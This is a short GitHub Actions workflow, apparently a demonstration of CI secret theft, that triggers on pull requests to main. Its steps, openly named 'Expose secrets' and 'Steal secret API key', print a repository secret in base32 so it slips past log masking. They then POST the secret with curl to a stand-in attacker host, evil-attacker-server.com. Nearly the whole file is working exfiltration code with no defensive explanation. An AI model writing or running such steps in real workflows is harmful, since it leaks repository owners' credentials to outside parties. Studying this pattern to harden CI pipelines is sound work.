name: Hack runners

on:
  pull_request:
    branches:
      - main

jobs:
  hack-runners:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v3

    - name: Install dependencies
      run: echo "Installing deps...."
      
    - name: Expose secrets
      run: |
        echo ${{secrets.EVIL_SECRET }} | base32

    - name: Steal secret API key
      env:
        SECRET: ${{secrets.EVIL_SECRET }}
      run: |
        curl -X POST -H "Content-Type: application/json" -d "{\"api_key\": \"$SECRET\"}" https://evil-attacker-server.com/api/steal_key
